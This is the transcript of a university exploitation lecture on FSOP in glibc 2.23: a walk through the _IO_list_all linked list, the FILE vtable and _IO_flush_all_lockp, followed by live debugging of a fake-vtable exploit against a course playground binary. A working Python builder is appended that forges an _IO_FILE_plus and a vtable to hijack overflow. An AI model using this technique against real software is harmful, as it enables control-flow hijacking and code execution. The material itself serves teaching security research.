Okey-dokey. So we just have some chat, since we're on Zoom today, purely to say: hey, where is everybody at? Where do we start? So I'm hoping that today ties together the last two lectures. The last two lectures were a little bit weird, and it's right in the middle of 533, just kind of continuing. So this is here for a reminder. By the way, I'll show you that later. Note to self: Note to Self demo. The _IO_ prefix is everywhere.

So what are we talking about here? We're talking about FILE structs, file streams, which is stderr, stdout, stdin, and anything that I might open with the kernel. And these things have a vtable. And so the three structs that matter are this _IO_FILE struct, where this offset will lead me to _IO_read_ptr, this offset will lead me to _IO_read_end, et cetera. _chain is how they make the linked list. So probably people latched on to, oh, I can see the linked list now: there is a global called _IO_list_all, and that global points at the first file struct. Here is one of them; this is me printing the dereference. _IO_list_all is not just an _IO_FILE but an _IO_FILE_plus, which is just a silly wrapper that has the file struct and a vtable pointer. The structure of the vtable is actually a jump table, _IO_jump_t, and the one for files is called _IO_file_jumps. And these are all the values in this particular struct. And this one is stderr, and it chains to stdout.

And here's my sort of demo of that. _IO_list_all is a pointer to an _IO_FILE_plus that is currently pointing at _IO_2_1_stderr_. That _IO_FILE_plus has a .file, which has a ._chain, which is a pointer to an _IO_FILE, which points at the struct for stdout. Now I don't need a .file here, because this one isn't a plus (although it is, but the pointer is to a FILE). So ._chain will give me stdin, and that ._chain will give me NULL. So this is the linked list.
This will always be there. _IO_list_all is the location of the head of a singly linked list: stderr, stdout, stdin, NULL. The vtable will point me to a table full of function pointers, and here is the dereference of that address. Observe these function pointers, take a look. The file stream might need finish, whatever overflow is, whatever underflow is, whatever pbackfail is, seekoff, seekpos, setbuf, doallocate, read, write, seek, close, stat, showmanyc, imbue. Each of these is an address of a function that it will use when it's time to do whatever that is, finish this thing, and so on.

Okey-dokey. So my goal today is to actually really do this stuff, hack with a demo, that kind of thing. And I'm going to gloss over these possible objectives. But just to say, why am I teaching you this? Why does this matter? One, it's a good example of us doing security research. Two, it is a target that is still viable. Three, it's one of our better candidates after the loss of __malloc_hook. Frequently our process is to go backwards to 2.23, when this thing was at its strongest, see what vulnerability existed, and see if we can find a way around it in the present.

So, possible objectives. Vtable hijacking. Okay? Then we will use some words to describe what vtable hijacking might mean. Knowing nothing else, never having used the term in your life before, how would vtable hijacking help us accomplish our goals, whatever it might mean? What's held in the vtable?

Vtable hijacking is pretty much replacing an entry in the vtable, just pointing it at an arbitrary address, replacing the address with something like a one_gadget.

Yeah, that's right. It's a lot like GOT overwriting, when we were doing printf exploits and were able to write over function addresses. If I can control that, then I can trigger one of these actions.
It's not doing what it thought it was going to do; it's going to do what I told it to. So this is a good way to control an instruction pointer. So in general, if there's a vtable... Now, does anybody know why vtables exist at all in code?

Because that way you don't have to have every file struct holding a pointer to all of those functions. You just have them point to the same table of functions, so you don't waste so much memory that way.

Okay, that's the thought. I actually think it's the opposite. Oh, wow. Okay. Okay, it's both. Yes. So then I've got less memory per file struct because they do share this vtable. The answer I was fishing for in my mind is that it allows me to have custom functionality for particular instances of a class. So for anything that's object-oriented coding, you need the ability to override your version of the function. So when I was learning object-oriented coding, it was like ducks: I'd have a duck class or an animal class, and the duck is an instance of the Animal class, or a subclass of the animal class. And then I can make a particular duck. And each one can have a different make_sound function. A generic animal is going to have a make_sound, but it doesn't have a particular default make_sound function; each subclass will make its own make_sound function. So duck will make Quack and dog will make Woof. And then a particular duck might have learned English or something and will tell a joke or whatever. So the vtable is how we implement this kind of hierarchical object-oriented coding. I think you're right also that it does save space if I've got things that share a vtable. But if I'm going to start overriding them, then I need the ability to make my own vtable for that particular one. Right? Does that resonate with anybody? You guys have all had object-oriented classes in the past and so on.
I'm staring at the black boxes, like, the image is not simple. So anyway, that's overriding. Cool, thanks.

So, next possible target. One possible target is overwriting the vtable; I love that concept, and we're going to look for it when we're doing security research. Next target: arbitrary read. All right. This is a file stream. File streams are how I display stuff on the screen. I can write to stdout. I can read from stdin. Well, look at the names of some of these pointers: _IO_read_ptr, _IO_read_end, and _IO_read_base. If I can overwrite those three pointers and trigger some sort of flush of this buffer, it's almost certainly going to show me all of the text from pointer to end. Which means that if I can put them at arbitrary addresses, I can leak all sorts of stuff. All right, so one of the possible targets that I might be interested in looking at and playing with in this playground is: can I read anything in the world that I want? And the answer is yes. There are some hoops to jump through, but yes.

How about arbitrary writing? Well, same deal. This is stdin: there is a write base and a write pointer and a write end and a buffer base and a buffer end. And probably some combination of addresses here will allow me to dump from some set of addresses to another set of addresses. Okay? But figuring out the mechanics of that and things like that, that's part of fooling around in this space.

One thing I will say: today my lecture topic is the old, ancient 2.23 FSOP kind of exploit. Well, this is the FSOP exploit that we're going to use in 2.23. It is a weird little thing: _IO_flush_all_lockp, right? You wouldn't know about it naturally. And as we do our research, we're looking for some sort of equivalent of this in the modern era.
What this is going to do is go through that linked list and flush all of the buffers. This is something that happens when a program is going to abort. Oh, there's a diagram. I thought I'd grabbed the diagram. I bet I put the diagram in its own tab. There's this diagram that I want to show you here. This is the dude that invented FSOP giving a talk, slides for that. I don't have the picture that I want here. I'm just going to do a Google search. Yes, flush all lockp. That's the image; thank you, Google. Okay, here we go.

This picture here, which should totally be embedded in my notes, forgive me for taking a second. This is what makes 2.23 vulnerable to us. And it is the following weird notion of how file streams work. When there is an error, a memory corruption or something like that, it goes through this chain: malloc_printerr, what's the error message, abort, then flush all the buffers. And flush all the buffers will call the vtable overflow on each of the file streams if they satisfy a condition. Okay, so this is what we're going to do in the House of Orange. That's the target this week: set this all up. We're going to use nothing but malloc to trigger all this stuff. Overwrite a fake vtable pointing at it, change overflow, overwrite a fake file stream. Pretty complex stuff. It's pretty complex for us, but if you can do it, you're like, okay, I'm good. This is why it works. It's a really cool exploit, because you will get your error message, you'll crash the program, and after that, get your shell. That's kind of cool. Like, here's all your error messages, your end-of-file warning or whatever, and then here's your shell.
Which is gratifying, because every time I get that end-of-file I always type ls anyway. It's the only time that it actually works.

Now, this is all academic to you. It's all words. We need to see it in action and do the thing. So here's how I'm going to have you do it in action. And thank you to Luke and others for helping me walk through this and improve it. So this is my second iteration; I've improved this since Monday. So here in our notes is the FSOP playground. This is where it goes from academic to really feeling it. And for those of you who are in that camp of "okay, I will get this when I start to do it," I'm going to show you how to do this kind of from scratch.

Here's our playground. Let's go to demos and I'll actually make a directory, class34. mkdir. Oh boy. Okey-dokey. gcc fsop.c. All right, cool. So this is a variation on the theme of our heap playground. By the way, I'm not removing the other exploits in the heap playground. If you've exploited the heap playground in the past, all those exploits still exist here. I'm adding more vulnerabilities, but it's just up to you to be like, okay, now I'm going to exploit it this way, different constraint. I'm going to give us a win function, too, simply to concentrate on just the thing I want to concentrate on today, which is vtable hijacking. And these are the two new functions that I added for you: link a chunk into the _IO_list_all singly linked list, and see a chunk's address. Getting a chunk's address is not hard with other leaks; this is just a lazy thing that I added. And this one is going to add one of our chunks, as if it were a file struct, into the linked list. I'm going to link it in after stderr: instead of stderr, stdout, it's stderr, some chunk we provided, then stdout. Okay, so let's fool around with that one.
We are working in glibc 2.23 for now. So I'm going to copy ld.so here. Yep, that's fine. And I'm going to copy some other things in there. As a researcher, I want to see what error message I'm getting. If I get an error message, I'm copying in malloc.c. And the other one in the source code is libio/genops.c. So by adding these two in here and then linking to a.out in our way, now if I run gdb a.out, run, Ctrl-C, I can see that my libc is this one, which is 2.23. My linker is here. And when I get to errors, I have the actual source code of where the error is triggering, inside the file stream code and inside of malloc with a malloc problem. There's maybe one other file I should put in there, and that's libioP.h, which I included in our notes but not for you. Okay?

So here is the goal. I have a working one of these, but I'm going to try to do it from scratch with you in the next 20 minutes. So here's what we're going to do. We're going to make a fake vtable. That is to say, we're going to make a struct that looks just like this, and I'm going to fill every one of these function pointers with the win address. All right, then I'm going to make a fake file stream. I'm going to make a chunk and declare that chunk as a file stream, an _IO_FILE struct. The _IO_FILE_plus struct will look like this, where I just have these values in here, and then a vtable pointer at the end. This one will point to my other chunk. Okay, so I'm going to fill this up with fake data, we're going to link it in, and then put the address of my fake vtable at the very end, that's at 216 bytes. We can do more of that offset stuff.
And our job is to make the overflow function pointer the win function, and then trigger the overflow function and see what goes wrong in _IO_flush_all_lockp. There's a bug that we're going to find, a sanity check that they do, that we're going to have to get around by making the struct a little bit smarter. So I want to show you that and how you get around it. And then we're ready to do our first file-stream-oriented thing and see what's happening.

Okay, so here we go. I have a starter exploit. This just reads the leak and adds the new things, leak and link, as Python. So here's my starter. Oh, one other thing I wanted to show you; I think this might be worth the price of admission. Again, my job is just to try to fill you up with as much goodness as possible. My job is to just tell you stuff that's useful. Well, take a look at this process here. This I picked up from another pwner, and I think it's beautiful as a security researcher. And that's kind of our theme right now: how do I go about finding new ones for the world? Take a look at this. This is a string that I'm going to put into my exploit script that's going to run a set of gdb commands at the beginning of my program. And this one is setting a pending breakpoint. So here's a symbol that's at a random address, and I can put this breakpoint in advance because I'm looking to trigger the _IO_flush_all_lockp function. I don't know what the address will be, but I'm going to enable these breakpoints once it's running and then hit continue. So: pending breakpoint, set a breakpoint, continue. I don't know what the number 1 means in the middle, because I grabbed it from somebody else, so I don't know if I add more of these whether it's 2 or something like that. I don't know what that one means.
I'll figure that out. But this little snippet I think is beautiful, because if I'm exploring the entirety of glibc and I'm hunting for some other version of something like this, the next oriented programming or whatever, to make that discovery and then patch it, I want to see it. Here's a vision for you: imagine all these vtable pointers; I'd like to see when any of them are triggered. And in fact, I'll show you one other cool thing. If I run gdb a.out, just hit run, and hit Ctrl-C, take a look at that stack frame, or this backtrace. Anytime I'm in here, there's a set of functions that ran in the past to get me to where I'm at. Well: main, __isoc99_scanf, _IO_vfscanf, _IO_default_uflow, __GI__IO_file_underflow, __read_nocancel. What? These are functions in the vtable, right? This is literally what the vtable is pointing at. So this whole time, every time we've hit Ctrl-C in gdb and looked at that backtrace, it's been going through this set of vtables and we didn't know about it. So just to say: it's always been with you, you just didn't know about it. And I'll do another twist, like at the end of the movie where you're like, oh my gosh, it was here the whole time. We can go all the way back to our first lectures. In our first lecture we're looking at the symbols in a.out. Well, look at that. What's the second symbol on the list? _IO_list_all. All of a sudden we care about that symbol, but we didn't know. And we've learned the PLT, and we've learned the GOT, and we've learned the data segments and things like that. I'm pretty sure there's a couple of other _IO symbols in here. There we go: _IO_stdin_used. Okay. _IO_list_all at a slightly different location. All right, that's interesting.
Okay, so just to say: this linked list was always here, right under our noses; we just see it today. That's the nature of it. So this stuff that we're touching seems esoteric to us, but it's just a different place. It's how anything reads and writes anything in the standard IO library, including stdio.h and every C program you've ever written. And that's the stuff that's happening.

Oh, okay. I've got tmux on for now. I'll leave it on. All right, so what was my goal? I want to make a fake vtable. So I'm just going to write my goals. Goal one: make a chunk that is the fake vtable. Goal two: get the address of that chunk. Goal three: make a chunk with a fake _IO_FILE struct. Goal four: link the fake _IO_FILE struct to the fake vtable. Goal five: link the fake file struct into _IO_list_all. Six, this is the 2.23 part: trigger the underflow function or overflow function. Hey, any questions before we dive in? I know it feels academic still, but I'm going to go step by step through these things and do them and see how that goes.

All right, how do I make a fake vtable? Well, I need malloc. How big should it be? Let's take a look at the struct. Here is a vtable, an _IO_jump_t. These are my offsets. 0xa0 is the last offset, so if I ask for 0xa8, that should be enough bytes to get the whole table into a chunk. So I'm going to say 0xa8. Now I'm going to need to fill it up with some addresses. I have a win function; I've leaked the win function, so I can put in my win address. And the question is, how many times do I do that? Two per 16 bytes: 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 21. So I need 21 function pointers in here. Everything's at offsets of eight. So I'm just going to make every single one of these values the same function pointer. So I'm just going to put 21.
Any questions on what I've made? I asked for an address in memory, I filled it with function pointers to the win address, 21 of them, and I'm okay with that. Structs: they're not magic, it's just data. Now I need to get the address of that chunk. This thing produces a leak for a particular index. So leak is my utility that will give me the address of that chunk. So I'll say vtable address equals leak(0).

All right, now we're going to make a file struct. Let's do the same process. How long is my file struct? A little bit interesting; it's not quite as clean. I've got some fours and twos in here, annoying. And at the end I've got char _unused2 starting at 0xc4, which is 20 bytes, so that's plus 0x14 in hexadecimal: 0xd8. 0xd8 is how long this is. And that's the _IO_FILE struct; I also need to add a pointer at the end of that. So I need it to be 0xe0, 0xd8 plus 8. You guys okay with the math I'm doing there? Actually, let's just do the math in Python. 0xc4 is 196, and then it was 20 bytes, that's how long that thing is, and that's 216. And then I need another eight bytes for the vtable pointer. So 224 bytes total. Does anybody have an idea what I'm doing there? I don't know if this is super obtuse or super obvious. Just give me a little thumbs up, a thumbs down, or a question. So I'm making a fake struct and we're going to replace all these values with whatever we want. And the size of it is 0xc4, the last thing is 20 bytes, then we're adding eight bytes at the end of that, because it's actually this _IO_FILE_plus business. That's right, it's these extra eight bytes after that. All right, 224 bytes. Now this one we're going to have to come back to.
So at the moment I know one thing: I need 216 bytes and then the address of my vtable. Now, these 216 bytes, this is not a good enough fake file struct, but this is what I know so far. So there's junk in there; I don't know what that means yet, as a baby researcher. But I do want it to point to the right vtable address. Okay. And now, okay, so that was goal four, so I kind of did that at once. Goal five is to link this into _IO_list_all. Well, that's the other thing that my playground models; the playground does some of the heavy lifting for you, just to show that it works. So we're going to link index 1 into the list. That's what the menu option does. So I'm going to pause here, we're going to step 5, and we're just going to run this thing and inspect and see what on earth we've done, and whether it makes sense to us and things like that. I'm losing students left and right; they're not in the list on the left. Figure that out later.

Here's the win function. Here's the chunk leak, which just prints out the address. And here is the linker, which is going to go into _IO_list_all, chain it to our guy, and put our guy in the middle. All right, let's run it and see how it goes: python3 -i x.py step 1. IndexError: list index out of range. All right. So not pending here. Ctrl-D. I think that might be a flaw in my exploit script. So if I made an adjustment somewhere, leaked addresses... So we've got a bug somewhere in my exploit script. Let's figure it out. It is inside of this thing. I'm going to turn off tmux, vi x.py. Honestly, I might even just debug this by printing. Where was it complaining? Complaining, complaining, here. So let's comment this out and see if it complains up to that. And it's complaining in my leak function, yeah, for sure it's complaining in the leak function.
So instead of the leak, let's just print everything here. Let's print this malloc. python3 -i x.py. Okay? So: "how big", "first payload". Here's the win function, based on the function. We're cool, we've got malloc. Let's do leak 0. Yeah, it totally mallocs twice there. Okay. Totally mallocs twice. I didn't make the second thing; I commented that out. Well, there's just a little flaw in my menu here. Now if I go to leak 0, that came out okay, hex of that. Okay, so I've just got a little bit of a logic bomb in my malloc, which is probably just a slight adjustment to the way that I'm reading something. And you feel like, hey, I fixed that in my own world, but not here. So it's literally just run a.out, malloc 0... I'm like reading the leak in a dumb way. Well, okay. I'm not going to sweat it too much. Let's do print malloc 0. All right, well, I think that should fix it up. Let's find out what I call the vtable address: 0x0. Okay, yeah, there's definitely something wrong with my malloc code in the script. It's like missing one part, like it's off by one in what it's receiving. Not sure why. I don't know that I have to care, because it was close enough to work that I can teach you and feed you, and I'm out of time. I definitely remember fixing something in my own homebrew version, but I want to build it from scratch. And so that's my flaw here. Okay, we're going to do this inside of tmux, python3 -i fsop.py, and spell python correctly. Okay?

All right. Here's what I wanted to show you. We want to see what we have done. So instead, I'm going to give this its own sort of world here. This is our fake file struct, all the way up until this guy, which is pointing at this heap address. Inside of tmux I have a hard time scrolling back. I can probably do dq at that address. Here we go.
This is the win function over and over and over again, all the way up until the end of the fake vtable. Let's take a look at it this way: p _IO_list_all.file._chain, that should point at my guy. The fact that it's not pointing to my guy means that our link didn't happen, or maybe I didn't do the link in my exploit script; that is all the things that are on me. Okay? I think I want to add something; it's often the world here. And I'm, as a public speaker, getting a little bit nervous. Oh, it's the same crap. It's the same crap. I've got something weird in my malloc where they're kind of off by one, and the vtable address is totally correct now. Let's try that again. Most of the time when it comes to this stuff, the issues are not your mental model; it's your debugging, the debugging tools that show you the exchange between them. That's why the debug argument. Where do I put that in? There's a command-line argument to the script; you don't have to add extra code, it should just work. Oh, so if I put debug here: python3 -i x.py debug, like that. That should work. Yeah.

All right. Now I'm going to turn off tmux, because I can't scroll back in time, and I've got my two monitors on. What this will amount to, by the way, because I can show you that from my prep for the lecture: here is a working exploit of this type. There was a working exploit of this type. Got the playground. Here is our transporter, that was me before. That's the issue. I see. Okay. There's my working exploit. So I did my homework, but I wanted to do it from scratch. But I think I must have fixed one little thing in here, either in fsop.c or in some line here. Now that you guys are not looking at a small level: 7, 11, the change is a compare on a cmp, line 121. Yeah.
It's somewhere right around here. When one said they were different, that line 121. Who reads from this function? Well, diff... oh, sorry, I should do diff fsop.c and 34's fsop.c. Okay, those look the same. diff x.py, step 1, a.out, a.out, that's fine, that's fine. I'll be darned. I don't see the difference. But basically every time I'm doing a malloc, it's doing two mallocs, because of this little demo. So you've got to run off to your next class. It's my office hours now, so I'll snip upon fixing whatever the number thing is, and I'll make it right, public-speaker-wise, on Friday. This is worth the price of admission.

invalid literal for int with base... I had to turn off... So we received "FSOP playground, win function at"; we read that correctly. We received the next bytes. We sent the byte 1, received "which index", we sent the byte 0. "How big", you send 216... first payload. Yeah. Send it the bytes for it, we'll poll. Oh, okay, this is what we got. Then I did view 0. Welcome to the code. And look at that. Oh, see, now it thinks it's in the middle, like a nine. How long is it? How long is a nine? So that's the end. And when we sent the 4, it's already asking "which index" here. So somehow at the end of the malloc it is going into the next menu request too quickly. So now it thinks I'm mallocing into index 4, it thinks that my "how big" is 0, and now it's going to put this "how big, first payload". So I've written something into... so somehow, in the way that I'm receiving, probably my recvuntil is a little bit off for the new thing. So maybe what I'll do is copy the exploit into a clean one. Okay. Oh, I know what the lines will be. I've got all these sendlines after the angle brackets. I've got these lines after angle brackets.
And I think when I added the leak, or the chunk thing or something like that, I included an angle bracket that I really shouldn't have. So I think these angle brackets here are good, let's honor that. But these angle brackets, wherever they are, that's what I'm receiving until. And here on this chunk leak, "that chunk's address is this", that I think probably shouldn't be an angle bracket. That's the bug, maybe. Let's go back and fix that. I'm reading until an angle bracket, and so this was going too far. I believe I didn't have that before: receiving until just the right angle bracket and space, or just until the angle bracket; that would be the trailing space. Yeah, this thing seems to have an angle bracket here after "first payload" and there. So this isn't two chunks, that must be recvuntil. When I went view 0, this is the recvuntil angle bracket, recvuntil angle bracket; this should be a 0 it's sending and it's sending a 4 there. So there's an extra angle bracket. That's an extra angle bracket, 0. So your question was: in my recvuntil, am I including a space, not including a space? Sendline after, yeah, we want to add it as well. I did the address somewhere in there, but I think this is... the view is a little bit funky that way; it was another address. So we're definitely in the debugger. My first payload send, like that, all looks correct. The recvuntil space seems to be working fine. Now I go 0. So this is the recvuntil here, but it's not stopping at that receive, it's stopping after that. Which means that in this payload... Okay. I think I just need to make this a little bit bigger. It's actually just the size of my thing. That is correct. Okay. Yes. Yes. Yes. I know.
I don't think it's got anything to do with the other stuff. I think that's all a false thing. But how big is 21 times 8? 168. And I want extra space for the backlog, 172, something like that. Yeah, I think that was the difference: somehow I was feeding it more data than I asked for. My math was just wrong on the size of my chunk; that's my flaw. So it was continuing on with stuff that I didn't address. So let's try it. Now, p _IO_list_all.file... one second. All right. Linking chunk... oh, it's linking chunk 5, and I want chunk 2. That's a flaw in my world. Oh yeah, that's dumb; that's not the chunk I want to link. In this chart you see _IO_list_all, stderr. So I also have a memory of something like this, where the vtable pointer is at a slightly different offset. Let's validate: p *_IO_list_all. Actually, let's just do p _IO_list_all. This is the address of stderr. Let's take note of that. There's the symbol. And now let's do p _IO_list_all.vtable. Say, well, here's the address of the vtable. Okay. I want to have this minus that. I have a working version too, I guess. Those are much further away than I want. I need an address. Why do you see our conversion? Let's file.

So if I just show you this: basically these folks are all the same. They do the same "greater than space" that I showed you. And I changed your view function a little bit here. I wrapped this in a while True, because sometimes the heap address has a newline in it, so if it detects that, it just tries again. And then here you can have a gdb argument, right, with gdb. Okay, so this is all the same as what you gave me, and then we just leak here with the offsets, and then use-after-free. Okay, so then what we do is, first, I make a fake vtable with a little class
I wrote it into another file that I can show you in a minute; it just sets the overflow function to the win address. Well, that's a nice script. Actually, that in a sec. Sure. Like I suggested, the fake file struct with _IO_write_ptr equal to one, which has to be greater than _IO_write_base, and _mode equal to minus 1. Yeah, and then it sets the vtable. Made it 300, 300. See, I think I was being a little too close to the vest on how much room I gave it, because my malloc asked for too little. But there's no harm in just asking for way more. So the file struct is 224. I don't remember how big the table is. Yeah, I want to say it should be 176 bytes or something like that. But now I like your strategy of just 300. Can you show me the weird FILE struct abstraction? So this is the vtable class. This is just the list of all of the function fields. And then the constructor, it just takes keyword args, and if one is there, it sets it to what you provide, and otherwise it sets it to 0. It's got an endianness argument too. And then here it just does the inverse, essentially, going to bytes. Alright, and then for your file struct, you've got how big each thing is, since some of these aren't pointers, so I had to store that. Yeah. That's pretty much the same. Okay. Well, that is beautiful. I don't know that it helps me debug. My thing is I had a working version 2 that was sort of more manual. Not totally sure what's going on in the course one. Exactly. So yes, I know it's all in there. It's been like that. And to some extent, from a teaching perspective, I knew that I had a working exploit, but I wanted to build it from scratch. I'd forgotten whatever wacky things I did to take it from painful to working. I didn't just want to be like, oh, here, it works.
And that's like two seconds of lecture time. I wanted to go through the process of it. And then it went off somewhere, just from a size thing. So I'll just spend some time debugging it and making amends, fighting with it. But that's awesome, sharing that abstraction thing. That's a really cool super tool or whatever. Yeah. Obviously it's 64-bit only right now. Sure, sure. Yeah, I'm fine living in 64-bit. 32-bit land is where the academic toys come from, or the embedded stuff. Okay, well, maybe I'll stop the recording, but I'll still just sit here and work on mine or whatever. You can take off and go have lunch or whatever, but I'm not going anywhere; it's office hours time anyway, so I'll stop the recording. Or maybe I'll just record the debugging process. So yeah, I'll give you my script and I'm going to hit... Thanks. Okey-dokey. So, see, I think it was a couple of errors. One, I like the idea of just making this bigger. I don't really care; 300 is fine. And here I made it exactly 224, which I should really just make bigger. Link five is wrong; I want link one. And none of the file struct stuff is... it's fine. I just wanted the lecture to work up to this point. Is it just the size? All right. _IO_list_all. Yes. There's the win. Yep. I just made my chunks bigger, and that's kind of how the heap goes. And we're back in. Okey-dokey. What happens if we make it bigger? No real difference. It just has more space at the end. So if I go down to the bottom and make this bigger as a struct, it's still just going to use what it needs. So I think I was just passing more data than it needed. So this should have been 224, and 224 should've been fine, but I'm really reading 225 bytes.
So it's adding a null byte at the end, and the null byte, I guess, was causing it to jump into malloc again or tripping up the menu. So that was the flaw. I don't think there's anything wrong with the scripts per se; I just didn't malloc enough room. I'll report that. Yeah. The issue was solved in just a few seconds. It was this: I wrote 224 bytes into the 224-byte chunk I malloc'd, plus the extra newline. That triggered it. I just asked for more space. Cool, I guess.
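The fake _IO_FILE_plus and vtable that the session is debugging, written out as an added Python example. This is not the lecture's or the student's script; it assumes the x86_64 glibc 2.23 layout (struct _IO_FILE_plus is 224 bytes with the vtable pointer at offset 0xd8, struct _IO_jump_t is 21 pointers, 168 bytes) and the flush condition from that version's _IO_flush_all_lockp. The function names and the WIN and CHUNK addresses are hypothetical; in a real run the addresses come from the heap and libc leaks discussed above.

```python
"""Fake _IO_FILE_plus + _IO_jump_t builder for the classic FSOP trick on
x86_64 glibc 2.23 (before vtable pointer validation landed in 2.24).

Offsets are taken from struct _IO_FILE / _IO_FILE_plus in libio.h for that
version; the addresses used in __main__ are hypothetical placeholders.
"""
import struct

# _IO_jump_t: 21 function-pointer slots, 8 bytes each on x86_64 (168 bytes).
JUMP_FIELDS = [
    "dummy", "dummy2", "finish", "overflow", "underflow", "uflow",
    "pbackfail", "xsputn", "xsgetn", "seekoff", "seekpos", "setbuf",
    "sync", "doallocate", "read", "write", "seek", "close", "stat",
    "showmanyc", "imbue",
]
JUMP_SIZE = 8 * len(JUMP_FIELDS)

# struct _IO_FILE field -> (offset, struct format), x86_64 glibc 2.23.
# Only the fields the attack touches plus a few neighbours are listed; the
# remainder of the 224-byte _IO_FILE_plus stays zero.
FILE_FIELDS = {
    "_flags":         (0x00, "<i"),
    "_IO_read_ptr":   (0x08, "<Q"),
    "_IO_read_end":   (0x10, "<Q"),
    "_IO_read_base":  (0x18, "<Q"),
    "_IO_write_base": (0x20, "<Q"),
    "_IO_write_ptr":  (0x28, "<Q"),
    "_IO_write_end":  (0x30, "<Q"),
    "_IO_buf_base":   (0x38, "<Q"),
    "_IO_buf_end":    (0x40, "<Q"),
    "_chain":         (0x68, "<Q"),
    "_fileno":        (0x70, "<i"),
    "_lock":          (0x88, "<Q"),
    "_wide_data":     (0xa0, "<Q"),
    "_mode":          (0xc0, "<i"),
    "vtable":         (0xd8, "<Q"),  # _IO_FILE_plus.vtable, right after _IO_FILE
}
FILE_PLUS_SIZE = 0xe0  # sizeof(struct _IO_FILE_plus) == 224


def fake_vtable(**funcs):
    """Serialise an _IO_jump_t with the named slots set and the rest zero."""
    unknown = set(funcs) - set(JUMP_FIELDS)
    if unknown:
        raise ValueError(f"not _IO_jump_t slots: {sorted(unknown)}")
    return b"".join(struct.pack("<Q", funcs.get(f, 0)) for f in JUMP_FIELDS)


def fake_file_plus(**fields):
    """Serialise a 224-byte _IO_FILE_plus with the given fields set."""
    buf = bytearray(FILE_PLUS_SIZE)
    for name, value in fields.items():
        off, fmt = FILE_FIELDS[name]
        struct.pack_into(fmt, buf, off, value)
    return bytes(buf)


def parse_file_plus(blob):
    """Inverse of fake_file_plus: read the known fields back out of a blob."""
    return {name: struct.unpack_from(fmt, blob, off)[0]
            for name, (off, fmt) in FILE_FIELDS.items()}


def flush_all_would_overflow(blob):
    """Mirror the narrow-stream check in glibc 2.23 _IO_flush_all_lockp:
    _IO_OVERFLOW(fp, EOF) is called only if _mode <= 0 and
    _IO_write_ptr > _IO_write_base.  The wide-char branch via _wide_data
    is not modelled here."""
    f = parse_file_plus(blob)
    return f["_mode"] <= 0 and f["_IO_write_ptr"] > f["_IO_write_base"]


def build_payload(win_addr, vtable_addr):
    """Fake FILE whose __overflow slot points at win_addr, so the walk over
    _IO_list_all during exit() calls it.  vtable_addr is where the fake
    _IO_jump_t will sit in memory; here it is placed directly after the
    fake FILE in the same chunk, so the two are returned as one blob."""
    vt = fake_vtable(overflow=win_addr)
    fp = fake_file_plus(
        _IO_write_base=0,
        _IO_write_ptr=1,   # > write_base: flush believes output is pending
        _mode=-1,          # <= 0: take the narrow-stream branch
        _chain=0,          # NULL terminates the list walk at this entry
        vtable=vtable_addr,
    )
    return fp + vt


if __name__ == "__main__":
    # Hypothetical addresses standing in for the real leaks.
    WIN = 0x400a4c
    CHUNK = 0x602010                       # where the fake FILE will land
    payload = build_payload(WIN, CHUNK + FILE_PLUS_SIZE)
    print("payload bytes:", len(payload))  # 224 + 168 = 392
    print("flush would call __overflow:", flush_all_would_overflow(payload))
```

The chunk that receives this blob has to be at least len(payload) bytes plus whatever the menu's read appends (the stray newline that cost the session its 225th byte); asking malloc for a few hundred bytes more, as suggested in the discussion, is harmless because the flush only reads the fields it needs. Two caveats: the exit() path reaches the list through _IO_flush_all_lockp(0), so _lock is not taken and can stay zero; and from glibc 2.24 on, the vtable pointer is checked against the __libc_IO_vtables section before any jump, so pointing it into the heap like this aborts on newer libcs, which is why the course targets 2.23.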
FSOP struggles
From Andrew Novocin May 04, 2022
Using our custom FSOP playground to link a fake _IO_FILE_plus struct into _IO_list_all
- Department: ECE
- Date Established: May 04, 2022